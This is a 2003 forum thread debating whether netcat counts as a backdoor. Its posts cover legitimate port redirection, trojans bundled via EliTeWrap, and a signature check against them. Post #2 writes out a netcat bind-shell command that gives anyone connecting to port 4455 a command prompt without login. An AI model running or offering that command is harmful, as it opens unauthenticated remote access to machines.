-
June 9th, 2003, 09:34 AM
#1
Member
newbie question regarding netcat
hi
would u pls ansr this question :
why are not netcat ( The Swiss Army Knife ) considre a backdoor?
coolcamel
-
June 9th, 2003, 10:19 AM
#2
Junior Member
It is considerd a back door as far as I know.
goto start>run> and type nc.exe-1 -p4455 -e cmd.exe
there ya go anyone telneting to port 4455 ont that box gets dos without login prompt.
It just isn't as nice as most trojans cause there is no gui
correction:
nc.exe -1 -p4455 -e cmd.exe
Hi, I don\'t care........ Thanks
4sale
-
June 9th, 2003, 01:46 PM
#3
netcat could be considered a trojan i guess, as stated in Lithium's post, but it can be used for many other legitimate purposes as well. I use it mainly for port redirection for outbound traffic from a secured subnet. DNS, SNMP and other services could all point to the netcat host, and the netcat host then redirects traffic through the firewall. The benefit to this of course is that you only have to allow outbound traffic from a single source IP on the firewall.
-
June 9th, 2003, 02:02 PM
#4
The benefit to this of course is that you only have to allow outbound traffic from a single source IP on the firewall.
Yep, that is one useful legitimate use for netcat.
People looking to misuse netcat will use it (I wont post the howto) to take advantage of open ports on a firewall via a reverse telnet session. This is one of the backdoor functions that netcat can perform. Also, someone else posted the remote shell capability, which is used as a staging step for actually getting a GUI backdoor up and running on a compromised host. For more NFO on how this can happen to you, look into a program called EliTeWrap. Through simple scripting, it delivers a set of backdoor programs via a single EXE file. I have actually seen this used and there are a few countermeasures such as looking to see if someone left the signature behind. You can check with a simple "Find" command against the file (Find EliTeWrap elfbowling.exe) the output would show the EliTeWrap signature along with the version. Anyway, this isn't always effective but I remember having that stupid elfbowling game circulating and it had EliTeWrap bundled with netcat and a few other nasties designed to gain remote access to any host that happened to launch the game.
Anyway, for what its worth....
-TH13
Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
-
June 9th, 2003, 09:00 PM
#5
Senior Member
interestingly enough, most tools that i've used can be considered a hacking tool but it really depends on the term hacker. i use these tools to troubleshoot and test network, like i said just a tool.
-w0rm3y
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|